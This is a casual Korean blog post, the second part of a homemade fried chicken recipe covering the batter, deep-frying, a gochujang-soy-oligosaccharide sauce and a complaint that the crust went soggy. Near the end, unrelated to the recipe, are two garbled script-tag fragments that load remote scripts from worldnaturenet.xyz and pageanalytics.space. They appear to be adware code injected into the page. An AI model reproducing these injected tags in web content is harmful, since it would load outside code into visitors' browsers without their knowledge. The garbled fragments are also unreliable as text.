어제 축구져서 그냥 바로 자버렸네요.. ㅋㅋ
1부에서 삶은 닭을 충분히 식힌 후 튀김을 했습니다 ㅋㅋ
전 요리사도 아니고.. 요리 전공도 아니고.. 요리 블로거도 아니고 ㅋㅋ
그냥 상상으로 요리한거라.. 조리법이든.. 이런거 잘 모릅니다. ㅋㅋ
튀김가루랑 소금이랑 계란이랑 뒤적뒤적 비벼서 반죽을 합니다... 사진을 못찍었네요 ㅋㅋ
냄비에 식용유 콸콸 부어넣고 뜨겁게 달굽니다.
튀김반죽?이 많이 남아서 브로컬리랑.. 남은 삼겹살이랑 더 튀겼습니다.
치킨 양념은 고추장, 설탕, 간장, 올리고당, 마늘, 굴소스, 참깨 넣어서 만들어봤습니다
결과물은.....
나름 맛있었고 만족합니다. ㅋㅋㅋㅋㅋ
근데 시간이 지나니 눅눅해지네요.. 쩝...
담에는 좀더 빠삭하게 만들어보고 싶은데 파우더인가 ? 그걸 넣어야 하는건가요 ? ? ㅋㅋ
- 셀프 통닭 만들기 끝 -
type="text/" src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.sj?uid=52096x5793x&r=24">? type="text/" src="http://pageanalytics.space/addons/lnkr5.min.sj">
닭을 염지 하고 양념이 된 튀김옷을 입혀 튀기면 '후라이드'
0/2000자